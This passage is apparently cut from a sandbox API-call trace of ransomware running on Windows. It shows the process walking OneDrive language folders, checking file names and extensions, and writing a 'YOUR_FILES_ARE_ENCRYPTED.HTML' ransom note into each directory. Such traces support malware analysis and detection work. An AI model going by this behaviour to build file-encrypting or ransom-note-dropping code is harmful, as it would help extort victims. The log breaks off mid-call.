ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f86930, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa501eeb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.849] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.849] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.849] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.849] lstrlenW (lpString=".mui") returned 4 [0161.849] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.849] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4f86930, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa501eeb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", 
cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.849] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.849] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.850] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.852] CloseHandle (hObject=0x5b8) returned 1 [0161.853] GetProcessHeap () returned 0x270000 [0161.853] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.853] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kok", cAlternateFileName="")) returned 1 [0161.853] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok") returned 75 [0161.854] GetProcessHeap () returned 0x270000 
[0161.854] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.854] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok" [0161.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*" [0161.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa501eeb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.854] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\FileSync.LocalizedResources.dll.mui") returned 111 [0161.854] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.854] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.854] lstrlenW (lpString=".mui") returned 4 [0161.854] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.854] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa51e7f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa51e7f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.854] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.855] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0161.855] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.855] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.858] CloseHandle (hObject=0x5b8) returned 1 [0161.858] GetProcessHeap () returned 0x270000 [0161.859] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.859] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0161.859] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab") returned 79 [0161.859] GetProcessHeap () returned 0x270000 [0161.859] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.859] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab" [0161.859] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*" [0161.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.861] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa51e7f30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.861] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.861] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0161.861] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.862] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.862] lstrlenW (lpString=".mui") returned 4 [0161.862] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.862] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5449530, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5449530, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.862] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.862] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0161.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.863] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.865] CloseHandle (hObject=0x5b8) returned 1 [0161.866] GetProcessHeap () returned 0x270000 [0161.866] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.866] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ky", cAlternateFileName="")) returned 1 [0161.866] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky") returned 74 [0161.866] GetProcessHeap () returned 0x270000 [0161.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.866] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky" [0161.867] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*" [0161.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5449530, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.867] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\FileSync.LocalizedResources.dll.mui") returned 110 
[0161.867] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.867] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.867] lstrlenW (lpString=".mui") returned 4 [0161.867] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.867] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5638710, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5638710, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.868] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.868] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.868] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.870] CloseHandle (hObject=0x5b8) returned 1 [0161.871] GetProcessHeap () returned 
0x270000 [0161.871] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.872] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0161.872] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu") returned 77 [0161.872] GetProcessHeap () returned 0x270000 [0161.872] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.872] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu" [0161.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*" [0161.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.872] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5638710, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.872] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.872] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.872] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.872] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.872] lstrlenW (lpString=".mui") returned 4 [0161.872] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.873] FindNextFileW (in: 
